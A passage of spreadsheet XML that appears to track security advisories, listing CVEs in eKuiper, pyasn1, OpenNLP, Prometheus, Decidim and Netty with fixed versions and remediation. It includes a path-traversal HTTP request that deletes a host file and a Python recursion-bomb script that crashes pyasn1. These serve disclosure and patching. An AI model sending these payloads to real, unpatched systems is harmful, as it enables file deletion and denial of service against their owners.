- In v2.4.0 and later, `basic.enablePrivateNet` in `kuiper.yaml` defaults to `false` (blocking private network access).
- If a developer's deployment legitimately requires eKuiper to communicate with internal REST services or private networks, they can explicitly opt in by setting `basic.enablePrivateNet: true` (or via environment variable `KUIPER__BASIC__ENABLEPRIVATENET=true`). Ensure eKuiper's API is protected before enabling this setting.
Reported by Alexey Kosmachev, Bi.Zone</t>
        </is>
      </c>
      <c r="S1266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-24979</t>
        </is>
      </c>
    </row>
    <row r="1267">
      <c r="A1267" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1267" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1267" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-58363</t>
        </is>
      </c>
      <c r="D1267" s="5" t="inlineStr"/>
      <c r="E1267" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F1267" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1267" s="5" t="inlineStr"/>
      <c r="H1267" s="5" t="inlineStr"/>
      <c r="I1267" s="5" t="inlineStr"/>
      <c r="J1267" s="5" t="inlineStr"/>
      <c r="K1267" s="5" t="inlineStr"/>
      <c r="L1267" s="5" t="inlineStr">
        <is>
          <t>go:github.com/lf-edge/ekuiper/v2</t>
        </is>
      </c>
      <c r="M1267" s="5" t="inlineStr">
        <is>
          <t>2.4.1</t>
        </is>
      </c>
      <c r="N1267" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1267" s="5" t="inlineStr"/>
      <c r="P1267" s="5" t="inlineStr"/>
      <c r="Q1267" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1267" s="5" t="inlineStr">
        <is>
          <t>### Summary
A path traversal vulnerability in eKuiper's administrative management endpoints allows privileged users or attackers with access to management APIs to delete arbitrary files or directories on the host system.
### Details
In `internal/plugin/native/manager.go`, the plugin installation endpoint (`POST /plugins/*`) constructs a temporary directory path by directly joining user-supplied resource names (`name`) without sufficient sanitization. Supplying path traversal sequences (such as `../../...`) causes the deferred cleanup operation (`os.RemoveAll`) to target arbitrary directories outside the intended plugin directory.
A related issue in configuration and rule lifecycle management where unvalidated rule identifiers could influence file deletion paths was also addressed by introducing unified identifier and file name validation.
### PoC
1. Target file deletion via plugin installation endpoint:
```http
POST /plugins/sources HTTP/1.1
Host: 127.0.0.1:9081
Content-Type: application/json
{
  "name": "../../../../../tmp/target.txt",
  "file": "http://example.com/plugin.zip",
  "shellParas": [],
  "functions": []
}
```
2. When the request finishes, `/tmp/target.txt` is removed by `os.RemoveAll`.
### Impact
An attacker with access to eKuiper management APIs can cause arbitrary file or directory deletion, potentially leading to denial of service or disruption of the host environment. This vulnerability provides a delete-only capability and does not permit arbitrary file creation, modification, or code execution.
### Remediation &amp; Patches
- **Upgrade to eKuiper &gt;= 2.4.1**: Input validation (`validate.ValidateID`) and file path validation (`path.VerifyFileName`) have been enforced across management endpoints.
### Workarounds
- Restrict network access to eKuiper management port (`9081`) via authentication, reverse proxies, and firewall rules.
- Run eKuiper with a dedicated non-root user account to limit file system deletion permissions.
### Credits
- @kosmosec
- @arpitjain099</t>
        </is>
      </c>
      <c r="S1267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-58363</t>
        </is>
      </c>
    </row>
    <row r="1268">
      <c r="A1268" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1268" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-24442</t>
        </is>
      </c>
      <c r="D1268" s="5" t="inlineStr"/>
      <c r="E1268" s="5" t="inlineStr"/>
      <c r="F1268" s="5" t="inlineStr"/>
      <c r="G1268" s="5" t="inlineStr"/>
      <c r="H1268" s="5" t="inlineStr"/>
      <c r="I1268" s="5" t="inlineStr"/>
      <c r="J1268" s="5" t="inlineStr"/>
      <c r="K1268" s="5" t="inlineStr"/>
      <c r="L1268" s="5" t="inlineStr"/>
      <c r="M1268" s="5" t="inlineStr"/>
      <c r="N1268" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1268" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1268" s="5" t="inlineStr"/>
      <c r="Q1268" s="5" t="inlineStr"/>
      <c r="R1268" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="S1268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-24442</t>
        </is>
      </c>
    </row>
    <row r="1269">
      <c r="A1269" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1269" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-26350</t>
        </is>
      </c>
      <c r="D1269" s="5" t="inlineStr"/>
      <c r="E1269" s="5" t="inlineStr"/>
      <c r="F1269" s="5" t="inlineStr"/>
      <c r="G1269" s="5" t="inlineStr"/>
      <c r="H1269" s="5" t="inlineStr"/>
      <c r="I1269" s="5" t="inlineStr"/>
      <c r="J1269" s="5" t="inlineStr"/>
      <c r="K1269" s="5" t="inlineStr"/>
      <c r="L1269" s="5" t="inlineStr"/>
      <c r="M1269" s="5" t="inlineStr"/>
      <c r="N1269" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1269" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1269" s="5" t="inlineStr"/>
      <c r="Q1269" s="5" t="inlineStr"/>
      <c r="R1269" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="S1269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26350</t>
        </is>
      </c>
    </row>
    <row r="1270">
      <c r="A1270" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1270" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28523</t>
        </is>
      </c>
      <c r="D1270" s="5" t="inlineStr"/>
      <c r="E1270" s="5" t="inlineStr"/>
      <c r="F1270" s="5" t="inlineStr"/>
      <c r="G1270" s="5" t="inlineStr"/>
      <c r="H1270" s="5" t="inlineStr"/>
      <c r="I1270" s="5" t="inlineStr"/>
      <c r="J1270" s="5" t="inlineStr"/>
      <c r="K1270" s="5" t="inlineStr"/>
      <c r="L1270" s="5" t="inlineStr"/>
      <c r="M1270" s="5" t="inlineStr"/>
      <c r="N1270" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1270" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1270" s="5" t="inlineStr"/>
      <c r="Q1270" s="5" t="inlineStr"/>
      <c r="R1270" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="S1270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28523</t>
        </is>
      </c>
    </row>
    <row r="1271">
      <c r="A1271" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1271" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30922</t>
        </is>
      </c>
      <c r="D1271" s="5" t="inlineStr"/>
      <c r="E1271" s="5" t="inlineStr"/>
      <c r="F1271" s="5" t="inlineStr"/>
      <c r="G1271" s="5" t="inlineStr"/>
      <c r="H1271" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I1271" s="5" t="inlineStr"/>
      <c r="J1271" s="5" t="inlineStr"/>
      <c r="K1271" s="5" t="inlineStr"/>
      <c r="L1271" s="5" t="inlineStr">
        <is>
          <t>pip:pyasn1</t>
        </is>
      </c>
      <c r="M1271" s="5" t="inlineStr">
        <is>
          <t>0.6.3</t>
        </is>
      </c>
      <c r="N1271" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O1271" s="5" t="inlineStr"/>
      <c r="P1271" s="5" t="inlineStr"/>
      <c r="Q1271" s="5" t="inlineStr">
        <is>
          <t>CWE-674, CWE-835</t>
        </is>
      </c>
      <c r="R1271" s="5" t="inlineStr">
        <is>
          <t>### Summary
The `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with Indefinite Length (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application.
### Details
The vulnerability exists because the decoder iterates through the input stream and recursively calls `decodeFun` (the decoding callback) for every nested component found, without tracking or limiting the recursion depth.
Vulnerable Code Locations:
1. `indefLenValueDecoder` (Line 998):
```for component in decodeFun(substrate, asn1Spec, allowEoo=True, **options):```
This method handles indefinite-length constructed types. It sits inside a `while True` loop and recursively calls the decoder for every nested tag.
2. `valueDecoder` (Lines 786 and 907):
```for component in decodeFun(substrate, componentType, **options):```
This method handles standard decoding when a schema is present. It contains two distinct recursive calls that lack depth checks: Line 786: Recursively decodes components of `SEQUENCE` or `SET` types. Line 907: Recursively decodes elements of `SEQUENCE OF` or `SET OF` types.
4. `_decodeComponentsSchemaless` (Line 661):
```for component in decodeFun(substrate, **options):```
This method handles decoding when no schema is provided.
In all three cases, `decodeFun` is invoked without passing a `depth` parameter or checking against a global `MAX_ASN1_NESTING` limit.
### PoC
```
import sys
from pyasn1.codec.ber import decoder
sys.setrecursionlimit(100000)
print("[*] Generating Recursion Bomb Payload...")
depth = 50_000
chunk = b'\x30\x80' 
payload = chunk * depth
print(f"[*] Payload size: {len(payload) / 1024:.2f} KB")
print("[*] Triggering Decoder...")
try:
    decoder.decode(payload)
except RecursionError:
    print("[!] Crashed: Recursion Limit Hit")
except MemoryError:
    print("[!] Crashed: Out of Memory")
except Exception as e:
    print(f"[!] Crashed: {e}")
```
```
[*] Payload size: 9.77 KB
[*] Triggering Decoder...
[!] Crashed: Recursion Limit Hit
```
### Impact
- This is an unhandled runtime exception that typically terminates the worker process or thread handling the request. This allows a remote attacker to trivially kill service workers with a small payload (&lt;100KB), resulting in a Denial of Service. Furthermore, in environments where recursion limits are increased, this leads to server-wide memory exhaustion.
- Service Crash: Any service using `pyasn1` to parse untrusted ASN.1 data (e.g., LDAP, SNMP, Kerberos, X.509 parsers) can be crashed remotely.
- Resource Exhaustion: The attack consumes RAM linearly with the nesting depth. A small payload (&lt;200KB) can consume hundreds of megabytes of RAM or exhaust the stack.
### Credits
Vulnerability discovered by Kevin Tu of TMIR at ByteDance.</t>
        </is>
      </c>
      <c r="S1271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30922</t>
        </is>
      </c>
    </row>
    <row r="1272">
      <c r="A1272" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1272" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34412</t>
        </is>
      </c>
      <c r="D1272" s="5" t="inlineStr"/>
      <c r="E1272" s="5" t="inlineStr"/>
      <c r="F1272" s="5" t="inlineStr"/>
      <c r="G1272" s="5" t="inlineStr"/>
      <c r="H1272" s="5" t="inlineStr"/>
      <c r="I1272" s="5" t="inlineStr"/>
      <c r="J1272" s="5" t="inlineStr"/>
      <c r="K1272" s="5" t="inlineStr"/>
      <c r="L1272" s="5" t="inlineStr"/>
      <c r="M1272" s="5" t="inlineStr"/>
      <c r="N1272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1272" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1272" s="5" t="inlineStr"/>
      <c r="Q1272" s="5" t="inlineStr"/>
      <c r="R1272" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="S1272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34412</t>
        </is>
      </c>
    </row>
    <row r="1273">
      <c r="A1273" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1273" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42027</t>
        </is>
      </c>
      <c r="D1273" s="5" t="inlineStr"/>
      <c r="E1273" s="5" t="inlineStr"/>
      <c r="F1273" s="5" t="inlineStr"/>
      <c r="G1273" s="5" t="inlineStr"/>
      <c r="H1273" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I1273" s="5" t="inlineStr"/>
      <c r="J1273" s="5" t="inlineStr"/>
      <c r="K1273" s="5" t="inlineStr"/>
      <c r="L1273" s="5" t="inlineStr">
        <is>
          <t>maven:org.apache.opennlp:opennlp-tools</t>
        </is>
      </c>
      <c r="M1273" s="5" t="inlineStr">
        <is>
          <t>1.9.5, 2.5.9, 3.0.0-M3</t>
        </is>
      </c>
      <c r="N1273" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O1273" s="5" t="inlineStr"/>
      <c r="P1273" s="5" t="inlineStr"/>
      <c r="Q1273" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-502</t>
        </is>
      </c>
      <c r="R1273" s="5" t="inlineStr">
        <is>
          <t>Versions Affected: before 1.9.5, before 2.5.9, before 3.0.0-M3
Description: 
The ExtensionLoader.instantiateExtension(Class, String) method loads a class by its fully-qualified name via Class.forName() and invokes its no-arg constructor, with the class name sourced from the manifest.properties entry of a model archive. The existing isAssignableFrom check correctly rejects classes that are not subtypes of the expected extension interface (BaseToolFactory for factory=, ArtifactSerializer for serializer-class-*), but the check runs after Class.forName() has already loaded and initialized the named class. 
Class.forName() with default initialization semantics executes the target class's static initializer before returning, so an attacker who can supply a crafted model archive can cause the static initializer of any class on the classpath to run during model loading, regardless of whether that class passes the subsequent type check. 
Exploitation requires a class with attacker-useful side effects in its static initializer (for example, JNDI lookup, outbound network I/O, or filesystem access) to be present on the classpath, so this is not a drop-in remote code execution; however, the attack surface grows as third-party model distribution becomes more common (community model repositories, Hugging Face-style sharing), where users routinely load model files from origins they do not control. A secondary, narrower vector affects deployments that ship legitimate BaseToolFactory or ArtifactSerializer subclasses with side-effecting no-arg constructors: a malicious manifest can name such a class and force its constructor to run during model load.
Mitigation: 
  * 1.x users should upgrade to 1.9.5.
  *  2.x users should upgrade to 2.5.9. 
  *  3.x users should upgrade to 3.0.0-M3. 
Note: The fix introduces a package-prefix allowlist that is consulted before Class.forName() is invoked, so the static initializer of a disallowed class is never executed. Classes under the opennlp. prefix remain permitted by default. Deployments that load models referencing factories or serializers outside opennlp.* must opt those packages in, either programmatically via ExtensionLoader.registerAllowedPackage(String) before the first model load, or by setting the OPENNLP_EXT_ALLOWED_PACKAGES system property to a comma-separated list of allowed package prefixes. 
Users who cannot upgrade immediately should ensure that all model files are sourced from trusted origins and should audit their classpath for classes with side-effecting static initializers or constructors, particularly any that perform JNDI lookups, network requests, or filesystem operations during class initialization.</t>
        </is>
      </c>
      <c r="S1273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42027</t>
        </is>
      </c>
    </row>
    <row r="1274">
      <c r="A1274" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1274" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42151</t>
        </is>
      </c>
      <c r="D1274" s="5" t="inlineStr"/>
      <c r="E1274" s="5" t="inlineStr"/>
      <c r="F1274" s="5" t="inlineStr"/>
      <c r="G1274" s="5" t="inlineStr"/>
      <c r="H1274" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1274" s="5" t="inlineStr"/>
      <c r="J1274" s="5" t="inlineStr"/>
      <c r="K1274" s="5" t="inlineStr"/>
      <c r="L1274" s="5" t="inlineStr">
        <is>
          <t>go:github.com/prometheus/prometheus</t>
        </is>
      </c>
      <c r="M1274" s="5" t="inlineStr">
        <is>
          <t>0.311.3</t>
        </is>
      </c>
      <c r="N1274" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O1274" s="5" t="inlineStr"/>
      <c r="P1274" s="5" t="inlineStr"/>
      <c r="Q1274" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-256, CWE-312</t>
        </is>
      </c>
      <c r="R1274" s="5" t="inlineStr">
        <is>
          <t>### Impact
Users who use Azure AD remote write with OAuth authentication are impacted.
The `client_secret` field in the Azure AD remote write OAuth configuration (`storage/remote/azuread`) was typed as `string` instead of `Secret`. Prometheus redacts fields of type `Secret` when serving the configuration via the `/-/config` HTTP API endpoint. Because the field was a plain string, the Azure OAuth client secret was exposed in plaintext to any user or process with access to that endpoint.
### Patches
The problem has been patched by changing `ClientSecret` in `OAuthConfig` to `Secret`. Users should upgrade to 3.11.3 or 3.5.3 LTS.
### Workarounds
Users  who can not upgrade can switch to Managed Identity or Workload Identity authentication for Azure AD remote write, which do not involve a client secret.</t>
        </is>
      </c>
      <c r="S1274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42151</t>
        </is>
      </c>
    </row>
    <row r="1275">
      <c r="A1275" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1275" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43635</t>
        </is>
      </c>
      <c r="D1275" s="5" t="inlineStr"/>
      <c r="E1275" s="5" t="inlineStr"/>
      <c r="F1275" s="5" t="inlineStr"/>
      <c r="G1275" s="5" t="inlineStr"/>
      <c r="H1275" s="5" t="inlineStr"/>
      <c r="I1275" s="5" t="inlineStr"/>
      <c r="J1275" s="5" t="inlineStr"/>
      <c r="K1275" s="5" t="inlineStr"/>
      <c r="L1275" s="5" t="inlineStr"/>
      <c r="M1275" s="5" t="inlineStr"/>
      <c r="N1275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1275" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1275" s="5" t="inlineStr"/>
      <c r="Q1275" s="5" t="inlineStr"/>
      <c r="R1275" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="S1275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43635</t>
        </is>
      </c>
    </row>
    <row r="1276">
      <c r="A1276" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1276" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43645</t>
        </is>
      </c>
      <c r="D1276" s="5" t="inlineStr"/>
      <c r="E1276" s="5" t="inlineStr"/>
      <c r="F1276" s="5" t="inlineStr"/>
      <c r="G1276" s="5" t="inlineStr"/>
      <c r="H1276" s="5" t="inlineStr"/>
      <c r="I1276" s="5" t="inlineStr"/>
      <c r="J1276" s="5" t="inlineStr"/>
      <c r="K1276" s="5" t="inlineStr"/>
      <c r="L1276" s="5" t="inlineStr"/>
      <c r="M1276" s="5" t="inlineStr"/>
      <c r="N1276" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1276" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1276" s="5" t="inlineStr"/>
      <c r="Q1276" s="5" t="inlineStr"/>
      <c r="R1276" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="S1276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43645</t>
        </is>
      </c>
    </row>
    <row r="1277">
      <c r="A1277" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1277" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44282</t>
        </is>
      </c>
      <c r="D1277" s="5" t="inlineStr"/>
      <c r="E1277" s="5" t="inlineStr"/>
      <c r="F1277" s="5" t="inlineStr"/>
      <c r="G1277" s="5" t="inlineStr"/>
      <c r="H1277" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1277" s="5" t="inlineStr"/>
      <c r="J1277" s="5" t="inlineStr"/>
      <c r="K1277" s="5" t="inlineStr"/>
      <c r="L1277" s="5" t="inlineStr">
        <is>
          <t>rubygems:decidim-elections</t>
        </is>
      </c>
      <c r="M1277" s="5" t="inlineStr">
        <is>
          <t>0.32.0</t>
        </is>
      </c>
      <c r="N1277" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O1277" s="5" t="inlineStr"/>
      <c r="P1277" s="5" t="inlineStr"/>
      <c r="Q1277" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1277" s="5" t="inlineStr">
        <is>
          <t>## Description
A low-privilege process-scoped admin who can manage elections can store arbitrary HTML in the question statement/body without sanitization, and the public elections UI renders that value unsafely.
## Technical description
This stored XSS appears because election question titles are rendered as trusted HTML instead of sanitized text. The election question editor stores `question.body` as a normal translatable string, and the public helper `question_title` returns that value with `html_safe` and no sanitization boundary, so any user who can edit election questions can persist markup or script-bearing payloads that later render on public election pages.
&lt;img width="1506" height="1285" alt="decidim-election-01" src="https://github.com/user-attachments/assets/2e17f396-10f9-4423-bb97-5badbdb20d21" /&gt;
&lt;img width="1540" height="657" alt="decidim-election-02" src="https://github.com/user-attachments/assets/178adb7b-d00e-4b5d-9237-f391e523973f" /&gt;
### Impact
A low-privilege process-scoped admin or other election editor with question-management rights can persist JavaScript that executes in visitor's browsers on public election pages and voting booth screens.
### Patches
See https://github.com/decidim/decidim/pull/16659
### Workarounds
Developers should review their implementation's administrator accesses and not give access to untrustworthy users
### Resources
OWASP XSS Injection
### Credits
This issue was discovered in a security audit organized by the [Decidim Association](https://decidim.org) and made by [Radically Open Security](https://www.radicallyopensecurity.com/) against Decidim financed by [NGI](https://ngi.eu/).</t>
        </is>
      </c>
      <c r="S1277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44282</t>
        </is>
      </c>
    </row>
    <row r="1278">
      <c r="A1278" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1278" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45674</t>
        </is>
      </c>
      <c r="D1278" s="5" t="inlineStr"/>
      <c r="E1278" s="5" t="inlineStr"/>
      <c r="F1278" s="5" t="inlineStr"/>
      <c r="G1278" s="5" t="inlineStr"/>
      <c r="H1278" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1278" s="5" t="inlineStr"/>
      <c r="J1278" s="5" t="inlineStr"/>
      <c r="K1278" s="5" t="inlineStr"/>
      <c r="L1278" s="5" t="inlineStr">
        <is>
          <t>maven:io.netty:netty-resolver-dns</t>
        </is>
      </c>
      <c r="M1278" s="5" t="inlineStr">
        <is>
          <t>4.1.135.Final, 4.2.15.Final</t>
        </is>
      </c>
      <c r="N1278" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O1278" s="5" t="inlineStr"/>
      <c r="P1278" s="5" t="inlineStr"/>
      <c r="Q1278" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-346</t>
        </is>
      </c>
      <c r="R1278" s="5" t="inlineStr">
        <is>
          <t>### Summary
Netty's DnsResolveContext fails to validate the origin (bailiwick) of CNAME records in DNS responses.
### Details
In `io.netty.resolver.dns.DnsResolveContext#buildAliasMap`, the resolver processes the ANSWER section of a DNS response and blindly caches all CNAME records it finds.
According to https://datatracker.ietf.org/doc/html/rfc5452#section-6 
```
Care must be taken to only accept
   data if it is known that the originator is authoritative for the
   QNAME or a parent of the QNAME.
   One very simple way to achieve this is to only accept data if it is
   part of the domain for which the query was intended.
```
### Impact
DNS Cache Poisoning (Bailiwick Bypass). Any application using Netty's DNS resolver is impacted.</t>
        </is>
      </c>
      <c r="S1278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45674</t>
        </is>
      </c>
    </row>
    <row r="1279">
      <c r="A1279" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1279" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47691</t>
        </is>
      </c>
      <c r="D1279" s="5" t="inlineStr"/>
      <c r="E1279" s="5" t="inlineStr"/>
      <c r="F1279" s="5" t="inlineStr"/>
      <c r="G1279" s="5" t="inlineStr"/>
      <c r="H1279" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1279" s="5" t="inlineStr"/>
      <c r="J1279" s="5" t="inlineStr"/>
      <c r="K1279" s="5" t="inlineStr"/>
      <c r="L1279" s="5" t="inlineStr">
        <is>
          <t>maven:io.netty:netty-resolver-dns</t>
        </is>
      </c>
      <c r="M1279" s="5" t="inlineStr">
        <is>
          <t>4.1.135.Final, 4.2.15.Final</t>
        </is>
      </c>
      <c r="N1279" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O1279" s="5" t="inlineStr"/>
      <c r="P1279" s="5" t="inlineStr"/>
      <c r="Q1279" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-346</t>
        </is>
      </c>
      <c r="R1279" s="5" t="inlineStr">
        <is>
          <t>### Summary
Netty's `DnsResolveContext` insufficiently validates the bailiwick of NS records, enabling DNS Cache Poisoning. An attacker controlling an authoritative name server for a subdomain can poison the cache for parent domains (like `.co.uk`).
### Details
In `io.netty.resolver.dns.DnsResolveContext.AuthoritativeNameServerList#add` method accepts any NS record from the AUTHORITY section as long as the record's name is a suffix of the questionName.
This means if the resolver queries evil.co.uk., it will accept an NS record claiming authority over co.uk.. Subsequently, the `handleWithAdditional` method caches the associated A records from the ADDITIONAL section directly into the `authoritativeDnsServerCache` under the parent domain's key (co.uk.). This bypasses standard bailiwick rules, where a server authoritative for a subdomain should not be trusted to provide authoritative records for its parent. The poisoned cache is then used for all future resolutions under co.uk..
The `io.netty.resolver.dns.DnsResolveContext.AuthoritativeNameServerList#cache` method only prevents caching if the record is for the root zone (dots == 1).
### Impact
DNS Cache Poisoning. Any application using Netty's DNS resolver is impacted.</t>
        </is>
      </c>
      <c r="S1279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47691</t>
        </is>
      </c>
    </row>
    <row r="1280">
      <c r="A1280" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1280" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49947</t>
        </is>
      </c>
      <c r="D1280" s="5" t="inlineStr"/>
      <c r="E1280" s="5" t="inlineStr"/>
      <c r="F1280" s="5" t="inlineStr"/>
      <c r="G1280" s="5" t="inlineStr"/>
      <c r="H1280" s="5" t="inlineStr"/>
      <c r="I1280" s="5" t="inlineStr"/>
      <c r="J1280" s="5" t="inlineStr"/>
      <c r="K1280" s="5" t="inlineStr"/>
      <c r="L1280" s="5" t="inlineStr"/>
      <c r="M1280" s="5" t="inlineStr"/>
      <c r="N1280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1280" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1280" s="5" t="inlineStr"/>
      <c r="Q1280" s="5" t="inlineStr"/>
      <c r="R1280" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
